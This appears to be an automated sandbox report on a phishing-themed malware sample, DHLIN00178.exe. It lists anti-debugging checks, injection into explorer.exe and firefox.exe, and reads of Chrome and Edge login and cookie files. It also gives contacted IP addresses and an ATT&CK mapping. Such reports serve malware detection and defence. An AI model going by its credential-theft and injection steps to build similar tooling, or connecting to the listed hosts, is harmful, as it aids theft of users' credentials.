        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 895
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 861
        Source: C:\Windows\SysWOW64\cscript.exeAPI coverage: 2.6 %
        Source: C:\Windows\SysWOW64\cscript.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_004062DD FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00402765 FindFirstFileA,
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00613200 FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\user\Desktop\DHLIN00178.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\DHLIN00178.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
        Source: DHLIN00178.exe, 00000005.00000003.6914823773.00000000076A0000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6914823773.00000000076AA000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001924598.00000000076AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 rdtsc
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C214C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2F4D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C244D1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C244D1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C354E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E4EF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E4EF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C064F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A4F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3A4F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF4FD mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C294FA mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8E4F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8E4F2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C00485 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3648A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3648A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3648A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3B490 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3B490 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8C490 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C024A2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C024A2 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8D4A0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8D4A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8D4A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C344A8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C984BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E4BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C10445 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C80443 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3D450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3D450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0D454 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2E45E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFB420 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CCA464 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8E461 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C08470 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C08470 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF640D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF478 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF409 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C96400 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C04180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C04180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C04180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF91F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF91F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF81EB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C29194 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C341BB mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C341BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C341BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD51B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C331BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C331BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C9314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C9314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C9314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C9314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD5149 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD3157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD3157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD3157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3415F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFF113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C3716D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C06179 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C5717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C5717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C2510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0510D mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C30118 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C37128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C37128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CBF13E mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFA147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFA147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFA147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C8A130 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C332C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C332C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04CD32C9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C232C5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BFC2B0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BF92AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C0A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C082E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C082E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C082E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C082E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C102F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C7E289 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
        Source: C:\Users\user\Desktop\DHLIN00178.exe Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\explorer.exe Network Connect: 104.21.8.203 80
        Source: C:\Windows\explorer.exe Network Connect: 156.255.170.114 80
        Source: C:\Windows\explorer.exe Network Connect: 222.122.213.231 80
        Source: C:\Windows\explorer.exe Network Connect: 34.117.168.233 80
        Source: C:\Windows\explorer.exe Network Connect: 64.190.63.111 80
        Source: C:\Windows\explorer.exe Network Connect: 3.9.182.46 80
        Source: C:\Windows\explorer.exe Network Connect: 199.192.30.193 80
        Source: C:\Windows\explorer.exe Network Connect: 38.163.2.19 80
        Source: C:\Windows\explorer.exe Network Connect: 185.53.177.54 80
        Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80
        Source: C:\Windows\explorer.exe Network Connect: 154.210.212.94 80
        Source: C:\Windows\explorer.exe Network Connect: 103.20.61.209 80
        Source: C:\Windows\explorer.exe Network Connect: 85.13.156.177 80
        Source: C:\Windows\explorer.exe Network Connect: 164.88.122.250 80
        Source: C:\Windows\explorer.exe Network Connect: 81.88.48.71 80
        Source: C:\Windows\explorer.exe Network Connect: 173.230.227.171 80
        Source: C:\Users\user\Desktop\DHLIN00178.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 6A0000
        Source: C:\Users\user\Desktop\DHLIN00178.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\DHLIN00178.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\cscript.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF739710000
        Source: C:\Windows\SysWOW64\cscript.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF739710000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\DHLIN00178.exe Thread APC queued: target process: C:\Windows\explorer.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exe Thread register set: target process: 4760
        Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 4760
        Source: C:\Users\user\Desktop\DHLIN00178.exe Process created: C:\Users\user\Desktop\DHLIN00178.exe C:\Users\user\Desktop\DHLIN00178.exe
        Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exe Code function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess

        Stealing of Sensitive Information

        Source: Yara match File source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\cscript.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Source: C:\Windows\SysWOW64\cscript.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\cscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\cscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\cscript.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

        Remote Access Functionality

        Source: Yara match File source: 00000008.00000002.9611657134.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.7003744896.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000008.00000002.9612907079.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000008.00000002.9614713149.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.7003407706.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        MITRE ATT&CK Matrix (numbers before a technique name are the signature counts shown in the report for that technique)

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | 1 Shared Modules | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 4 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 3 Obfuscated Files or Information | LSASS Memory | 4 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | 711 Process Injection | 1 Software Packing | Security Account Manager | 121 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
